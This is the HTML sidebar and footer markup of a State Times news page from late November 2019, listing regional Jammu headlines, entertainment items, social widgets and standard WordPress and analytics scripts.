			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/notices-served-to-eight-si-appointees-of-st-deptt/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Notices served to eight SI appointees of ST Deptt" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/notices-served-to-eight-si-appointees-of-st-deptt/">Notices served to eight SI appointees of ST Deptt</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:40:09+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/panel-constituted-to-examine-right-to-information-act-issues/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Panel constituted to examine Right to Information Act issues" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/panel-constituted-to-examine-right-to-information-act-issues/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Panel constituted to examine Right to Information Act issues" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/panel-constituted-to-examine-right-to-information-act-issues/">Panel constituted to examine Right to Information Act issues</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:40:07+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/dr-jitendra-for-wider-application-of-nuclear-technology/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Jitendra.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Jitendra.jpg" alt="Dr Jitendra for wider application of nuclear technology" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/dr-jitendra-for-wider-application-of-nuclear-technology/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Jitendra.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Jitendra.jpg" alt="Dr Jitendra for wider application of nuclear technology" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/dr-jitendra-for-wider-application-of-nuclear-technology/">Dr Jitendra for wider application of nuclear technology</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:25:49+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/life-term-in-murder-case-2/">Life-term in murder case</a></li>

			
			<li><a href="http://news.statetimes.in/woman-three-kids-killed-3-others-injured-in-lpg-cylinder-blast/">Woman, three kids killed; 3 others injured in LPG cylinder blast</a></li>

			
			<li><a href="http://news.statetimes.in/three-killed-ias-officer-among-4-of-family-injured-in-mishaps/">Three killed, IAS officer among 4 of family injured in mishaps</a></li>

			
			<li><a href="http://news.statetimes.in/b2v2-overwhelming-public-response-continues-on-day-5/">B2V2: Overwhelming public response continues on day 5</a></li>

			
			<li><a href="http://news.statetimes.in/smvdu-organises-national-workshop-on-development-prospects-of-thermoelectric-energy/">SMVDU organises national workshop on  development, prospects of thermoelectric energy</a></li>

			
			<li><a href="http://news.statetimes.in/degree-college-poonch-celebrates-world-aids-day/">Degree College Poonch  celebrates World AIDS Day</a></li>

			
			<li><a href="http://news.statetimes.in/dulhasti-power-station-provides-dustbins-to-dh-kishtwar/">Dulhasti Power Station provides dustbins to DH Kishtwar</a></li>

			
			<li><a href="http://news.statetimes.in/training-for-paramedical-staff-students-faculty-in-clinical-biochemical-technologies-concludes/">Training for paramedical staff, students, faculty in Clinical Biochemical Technologies concludes</a></li>

			
			<li><a href="http://news.statetimes.in/take-measures-to-address-winter-vagaries-in-chenab-region-congress/">Take measures to address winter vagaries in Chenab region: Congress</a></li>

			
			<li><a href="http://news.statetimes.in/gdc-r-s-pura-imparts-awareness-on-aids/">GDC R S Pura imparts awareness on AIDS</a></li>

			
			<li><a href="http://news.statetimes.in/abvp-organises-workshop-on-self-defence-under-mission-sahasi/">ABVP organises workshop on self defence under mission Sahasi</a></li>

			
			<li><a href="http://news.statetimes.in/director-accounts-inspects-sub-treasuries/">Director Accounts &#038; Treasuries convenes officer-public meetings; inspects sub treasuries</a></li>

			
			<li><a href="http://news.statetimes.in/army-organises-debate-competition-4/">Army organises debate competition</a></li>

			
			<li><a href="http://news.statetimes.in/smvdu-holds-national-training-programme-for-ifs-officers/">SMVDU  holds national training  programme for IFS officers</a></li>

			
			<li><a href="http://news.statetimes.in/dlsa-holds-plantation-drive/">DLSA  holds plantation drive</a></li>

			
			<li><a href="http://news.statetimes.in/vendor-held-for-selling-expired-juice-to-commuters/">Vendor held for selling expired juice to commuters</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/black-widow-to-release-in-india-april-30/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/black-window.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/black-window.jpg" alt="'Black Widow' to release in India April 30" width="265" height="168">			  <p class="slide-caption">&#8216;Black Widow&#8217; to release in India April 30</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/karan-zoya-dibakar-and-anurags-ghost-stories-to-debut-on-netflix-on-jan-1-2020/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Ghost-Stories.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Ghost-Stories.jpg" alt="Karan, Zoya, Dibakar and Anurag's 'Ghost Stories' to debut on Netflix on Jan 1, 2020" width="265" height="168">			  <p class="slide-caption">Karan, Zoya, Dibakar and Anurag&#8217;s &#8216;Ghost Stories&#8217; to debut on Netflix on Jan 1, 2020</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/priyadarshan-akshay-kumar-to-reunite-for-comedy/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Priyadarshan-Akshay-Kumar-to-reunite-for-comedy.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Priyadarshan-Akshay-Kumar-to-reunite-for-comedy.jpg" alt="Priyadarshan-Akshay Kumar to reunite for comedy" width="265" height="168">			  <p class="slide-caption">Priyadarshan-Akshay Kumar to reunite for comedy</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/rajkummar-rao-such-a-giving-co-actor-fatima/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Rajkummar-Rao-such-a-giving-co-actor-Fatima.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Rajkummar-Rao-such-a-giving-co-actor-Fatima.jpg" alt="Rajkummar Rao such a giving co-actor: Fatima" width="265" height="168">			  <p class="slide-caption">Rajkummar Rao such a giving co-actor: Fatima</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/noah-hawley-to-direct-star-trek-4-for-paramount/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Noah-Hawley-to-direct-Star-Trek-4-for-Paramount.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Noah-Hawley-to-direct-Star-Trek-4-for-Paramount.jpg" alt="Noah Hawley to direct 'Star Trek 4' for Paramount" width="265" height="168">			  <p class="slide-caption">Noah Hawley to direct &#8216;Star Trek 4&#8217; for Paramount</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1504</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href=""  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>0</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">thietbicuuhoa.com</a> <time>on 15 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/">CISF seizes 5 gold bars at Hyderabad Airport</a></span></h4>
                                    <p>I have read so many articles or reviews on the topic of the blogger ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">scr888 judi</a> <time>on 02 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/">Gold prices extend slide on lacklustre demand</a></span></h4>
                                    <p>With the desire comes having of invention. Even you feel hurt when he ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"7e91c64a15","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2019-11-30 12:16:54 by W3 Total Cache
-->